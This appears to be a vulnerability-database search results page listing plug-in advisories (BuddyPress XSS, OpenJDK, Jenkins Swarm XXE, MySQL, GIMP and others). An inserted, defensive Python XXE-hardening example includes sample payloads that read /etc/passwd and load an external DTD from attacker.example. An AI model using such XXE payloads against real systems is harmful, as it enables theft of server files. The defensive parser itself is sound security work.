Lucene search: 1464 matches found

Hacker One, added 2019/05/29 1:45 p.m.

WordPress: Stored XSS in BuddyPress Plug-in via group name

Hi, I found that there is a stored XSS in another output of the group name, but this XSS needs a key combination to be pressed to trigger. Just create or modify the group information, set the group name to the following payload, and then access the Group page; if you are on macOS you need to press ...

AI score 0.8 | Exploits 0
Veracode, added 2019/05/02 5:51 a.m.

Information Disclosure

Red Hat OpenShift Container Platform is the company's cloud computing Platform-as-a-Service (PaaS) solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 3.6.1. See the following advisory for the container imag...

CVSS 7.5 | AI score 7.5 | EPSS 0.00182
Exploits 0 | References 18 | Affected software 10
Veracode, added 2019/05/02 5:13 a.m.

Sandbox Protection Bypass

The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. An off-by-one flaw, leading to a buffer overflow, was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause t...

CVSS 10 | AI score 5.5 | EPSS 0.09204
Exploits 1 | References 42 | Affected software 4
Veracode, added 2019/05/02 5:13 a.m.

Denial Of Service (DoS)

The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. An off-by-one flaw, leading to a buffer overflow, was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause t...

CVSS 10 | AI score 5.5 | EPSS 0.09204
Exploits 1 | References 42 | Affected software 4
Veracode, added 2019/05/02 5:06 a.m.

Denial Of Service (DoS)

Red Hat Enterprise Linux OpenStack Platform provides the facilities for building a private or public infrastructure-as-a-service (IaaS) cloud running on commonly available physical hardware. This update addresses the following issues: This package rebases mariadb-galera to 5.5.42, fixing an issue...

CVSS 4 | AI score 5.8 | EPSS 0.04017
Exploits 0 | References 25 | Affected software 12
Veracode, added 2019/05/02 5:06 a.m.

Denial Of Service (DoS)

Red Hat Enterprise Linux OpenStack Platform provides the facilities for building a private or public infrastructure-as-a-service (IaaS) cloud running on commonly available physical hardware. This update addresses the following issues: This package rebases mariadb-galera to 5.5.42, fixing an issue...

CVSS 4 | AI score 5.8 | EPSS 0.04017
Exploits 0 | References 33 | Affected software 12
Veracode, added 2019/05/02 5:02 a.m.

Information Disclosure

The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when...

CVSS 10 | AI score 8.6 | EPSS 0.11906
Exploits 0 | References 10 | Affected software 1
Veracode, added 2019/05/02 5:02 a.m.

Information Disclosure

The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when...

CVSS 10 | AI score 8.6 | EPSS 0.11906
Exploits 0 | References 12 | Affected software 1
Veracode, added 2019/05/02 4:44 a.m.

Arbitrary Code Execution

The IcedTea-Web project provides a Java web browser plug-in and an implementation of Java Web Start, which is based on the Netx project. It also contains a configuration tool for managing deployment settings for the plug-in and Web Start implementations. It was discovered that the IcedTea-Web...

CVSS 6.8 | AI score 6.3 | EPSS 0.0249
Exploits 0 | References 24 | Affected software 1
Veracode, added 2019/05/02 4:42 a.m.

Denial Of Service (DoS)

The IcedTea-Web project provides a Java web browser plug-in and an implementation of Java Web Start, which is based on the Netx project. It also contains a configuration tool for managing deployment settings for the plug-in and Web Start implementations. An uninitialized pointer use flaw was foun...

CVSS 7.5 | AI score 9.3 | EPSS 0.0278
Exploits 1 | References 20 | Affected software 1
Prion, added 2019/04/30 1:29 p.m.

XXE

Jenkins Self-Organizing Swarm Plug-in Modules Plugin clients that use UDP broadcasts to discover Jenkins masters do not prevent XML External Entity processing when processing the responses, allowing unauthorized attackers on the same network to read arbitrary files from Swarm clients...

CVSS 4.8 | AI score 9.1 | EPSS 0.00068
Exploits 0 | References 4
CVE, added 2019/04/30 12:25 p.m.

CVE-2019-10309

The CVE-2019-10309 entry concerns the Jenkins Swarm Plugin (Swarm Client) where UDP-based master discovery responses are XML documents that are parsed without proper XXE protection. This XXE flaw could allow an unauthenticated attacker on the same network to read arbitrary files from Swarm client...

CVSS 9.3 | AI score 9 | EPSS 0.00068
Exploits 0 | References 4 | Affected software 1
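The two Jenkins Swarm entries above (the Prion entry and CVE-2019-10309) describe the same condition: discovery responses arrive over an unauthenticated UDP broadcast, so anyone on the network can answer, and the plug-in parsed those answers as XML without XXE protection. The check a practitioner wants for any XML received on such a channel is a parser that refuses DTDs outright. The following is an added example, not code from the Swarm plug-in, Jenkins or Vulners: a Python parser on the standard-library expat bindings that rejects any DOCTYPE, entity declaration or external entity reference before the document body is processed. The response layout (`<discovery><url>...</url></discovery>`) and the three sample messages are constructed for the illustration and are not the plug-in's real wire format; the Java equivalent in the plug-in would be the parser features that disallow DOCTYPE declarations.

```python
import xml.parsers.expat as expat


class UnsafeXmlError(ValueError):
    """The document declared a DTD or entity, or referenced an external one."""


def parse_discovery_response(data: bytes) -> dict:
    """Parse a discovery response into {child_tag: text}, refusing any DTD.

    Every hook expat offers for DTD-related constructs is wired to raise,
    so an entity such as <!ENTITY x SYSTEM "file:///etc/passwd"> is rejected
    before the parser could ever be asked to resolve it. The element layout
    assumed here (a flat root with text-only children) is a constructed
    stand-in for the real Swarm wire format.
    """
    parser = expat.ParserCreate()
    # Never parse parameter entities, so an external DTD subset is not fetched.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError(f"DOCTYPE {name!r} not allowed in a discovery response")

    def reject_entity_decl(name, *_):
        raise UnsafeXmlError(f"entity declaration {name!r} not allowed")

    def reject_external_ref(context, base, sysid, pubid):
        raise UnsafeXmlError(f"external entity reference to {sysid!r} not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity_decl
    parser.ExternalEntityRefHandler = reject_external_ref

    result = {}
    depth = [0]   # current element nesting depth
    text = []     # character data of the element being read

    def start(name, attrs):
        depth[0] += 1
        text.clear()

    def chars(fragment):
        text.append(fragment)

    def end(name):
        if depth[0] == 2:  # a direct child of the root element
            result[name] = "".join(text).strip()
        depth[0] -= 1
        text.clear()

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return result


def is_rejected(data: bytes) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_discovery_response(data)
    except UnsafeXmlError:
        return True
    return False


# Constructed sample messages (not captured Swarm traffic).
BENIGN_RESPONSE = (
    b'<?xml version="1.0"?>'
    b'<discovery><url>http://jenkins.example.com:8080/</url></discovery>'
)
XXE_INTERNAL_DTD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE discovery [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    b'<discovery><url>&xxe;</url></discovery>'
)
XXE_EXTERNAL_DTD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE discovery SYSTEM "http://attacker.example/evil.dtd">'
    b'<discovery><url>x</url></discovery>'
)

if __name__ == "__main__":
    print(parse_discovery_response(BENIGN_RESPONSE))
    for sample in (XXE_INTERNAL_DTD, XXE_EXTERNAL_DTD):
        print("rejected" if is_rejected(sample) else "ACCEPTED")
```

Rejecting the DOCTYPE is the decisive control: both the inline entity and the external DTD subset are refused at the `<!DOCTYPE` token, so the entity and external-reference hooks only serve as defence in depth. Because the channel is unauthenticated, the benign message should still be treated as untrusted input; this parser only guarantees that no file or URL is read while handling it.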
Prion, added 2019/04/29 2:29 p.m.

Code injection

Element Plug-in for vCenter Server versions prior to 4.2.3 may disclose sensitive account information to an unauthenticated attacker. NetApp HCI Compute Node versions prior to 1.4P2 bundle affected versions of Element Plug-in for vCenter Server...

CVSS 5 | AI score 7.5 | EPSS 0.00457
Exploits 0 | References 2 | Affected software 2
CVE, added 2019/04/29 1:49 p.m.

CVE-2019-5492

CVE-2019-5492 affects Element Plug-in for vCenter Server prior to 4.2.3; NetApp HCI Compute Node versions prior to 1.4P2 bundle affected versions of the same plug-in. The vulnerability is that it may disclose sensitive account information to an unauthenticated attacker. The available connected document...

CVSS 7.5 | AI score 7.4 | EPSS 0.00457
Exploits 0 | References 2 | Affected software 1
OSV, added 2019/04/23 12:00 a.m.

UBUNTU-CVE-2019-2566

Vulnerability in the MySQL Server component of Oracle MySQL subcomponent: Server: Audit Plug-in. Supported versions that are affected are 5.7.25 and prior and 8.0.15 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromis...

CVSS 4.9 | AI score 6.6 | EPSS 0.00244
Exploits 0 | References 4
CNVD, added 2019/04/17 12:00 a.m.

Oracle MySQL Server Access Control Error Vulnerability (CNVD-2019-16278)

Oracle MySQL is an open source relational database management system from Oracle Corporation, of which MySQL Server is a database server component. A security vulnerability exists in the MySQL Server component of Oracle MySQL, version 5.7.25 and earlier, and the Server: Audit Plug-in subcomponent...

CVSS 4.9 | AI score 6 | EPSS 0.00244
Exploits 0 | References 1
RedHat Linux, added 2019/04/10 2:26 p.m.

Critical: Red Hat Security Advisory: flash-plugin security update

An update for flash-plugin is now available for Red Hat Enterprise Linux 6 Supplementary. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each...

CVSS 10 | AI score 7.3 | EPSS 0.06773
Exploits 0 | References 4
Veeam, added 2019/01/25 12:00 a.m.

How to Collect Logs for Veeam Plug-in for Oracle RMAN

Purpose This article documents how to collect the diagnostic information needed for a support case involving the Veeam Plug-in for Oracle RMAN. Solution 1. Collect diagnostic information as documented in the five sections below. 2. Combine the data into a single .zip file. 3. Attach the zip file ...

AI score 7.1
Exploits 0 | Affected software 1
Veeam, added 2019/01/25 12:00 a.m.

How to Collect Logs for Veeam Plug-in for SAP HANA

Purpose This article documents how to collect the diagnostic information needed for a support case involving the Veeam Plug-in for SAP HANA. Solution 1. Collect diagnostic information as documented in the four sections below. 2. Combine the data into a single .zip file. 3. Attach the zip file to...

AI score 6.9
Exploits 0 | Affected software 1
Veracode, added 2019/01/15 8:52 a.m.

Remote Code Execution (RCE)

GIMP is vulnerable to remote code execution (RCE). The vulnerability exists due to multiple stack-based buffer overflows in file-xwd.c in the X Window Dump (XWD) plug-in in GIMP 2.8.2 that allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large 1...

CVSS 7.5 | AI score 7.7 | EPSS 0.06336
Exploits 1 | References 16 | Affected software 1